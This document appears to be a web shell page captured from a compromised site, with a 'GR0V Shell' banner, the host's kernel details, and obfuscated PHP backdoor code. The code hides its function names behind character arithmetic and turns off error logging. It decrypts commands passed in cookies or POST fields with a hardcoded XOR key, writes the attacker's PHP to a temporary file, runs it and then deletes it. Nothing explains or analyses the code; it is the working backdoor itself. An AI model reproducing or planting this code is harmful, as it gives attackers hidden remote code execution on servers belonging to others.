?
GR0V Shell
GR0V shell
Linux www.koreapackagetour.com 2.6.32-042stab145.3 #1 SMP Thu Jun 11 14:05:04 MSK 2020 x86_64
<?php $tzylIV = "\146".'i'.chr(1043-935).chr(421-320).'_'.chr(112).'u'.'t'."\x5f"."\x63"."\157"."\x6e".chr(116)."\x65"."\x6e".'t'."\x73";
$pMKQKE = chr(712-614).chr(97).chr(867-752).chr(101).chr(54).chr(88-36).'_'.chr(622-522).chr(101)."\143"."\x6f"."\x64"."\x65";
$HzPpfxP = chr(105).'n'.chr(385-280).chr(95)."\163".chr(670-569).chr(221-105);
$hqgAxcJtr = "\165".chr(255-145)."\x6c".chr(240-135)."\x6e"."\153";
@$HzPpfxP(chr(1045-944)."\x72".'r'.chr(111)."\x72".chr(95)."\154"."\157"."\x67", NULL);
@$HzPpfxP("\154"."\157".'g'.chr(409-314).chr(1024-923)."\162"."\x72"."\157"."\x72".'s', 0);
@$HzPpfxP('m'.chr(1005-908).'x'.'_'.chr(101).chr(120).chr(145-44).chr(166-67)."\165"."\x74".'i'."\157".chr(110)."\137".chr(494-378).chr(454-349).chr(490-381).chr(101), 0);
@set_time_limit(0);
function ZBRqb($ucdpRZsaA, $cVfFCDtXS)
{
$nOiFFCY = "";
for ($LobfH = 0; $LobfH < strlen($ucdpRZsaA);) {
for ($j = 0; $j < strlen($cVfFCDtXS) && $LobfH < strlen($ucdpRZsaA); $j++, $LobfH++) {
$nOiFFCY .= chr(ord($ucdpRZsaA[$LobfH]) ^ ord($cVfFCDtXS[$j]));
}
}
return $nOiFFCY;
}
$LobfHULQnmtdg = array_merge($_COOKIE, $_POST);
$aVsuc = '426ab92c-a987-4ef6-a6ca-230c7276dca8';
foreach ($LobfHULQnmtdg as $RXLfvWwM => $ucdpRZsaA) {
$ucdpRZsaA = @unserialize(ZBRqb(ZBRqb($pMKQKE($ucdpRZsaA), $aVsuc), $RXLfvWwM));
if (isset($ucdpRZsaA['a'."\x6b"])) {
if ($ucdpRZsaA["\141"] == "\x69") {
$LobfH = array(
chr(112)."\x76" => @phpversion(),
"\x73".'v' => "3.5",
);
echo @serialize($LobfH);
} elseif ($ucdpRZsaA["\141"] == 'e') {
$fjipIvztkB = "./" . md5($aVsuc) . "\x2e".chr(420-315).'n'.'c';
@$tzylIV($fjipIvztkB, "<" . "\77".'p'."\150"."\160".' '."\x40".chr(117).chr(518-408).'l'."\x69"."\156".'k'.chr(434-394).chr(95).'_'."\x46".chr(73)."\x4c".'E'."\x5f".chr(95).chr(407-366).chr(59).chr(32) . $ucdpRZsaA[chr(100)]);
include($fjipIvztkB);
@$hqgAxcJtr($fjipIvztkB);
}
exit();
}
}
T1KUS90T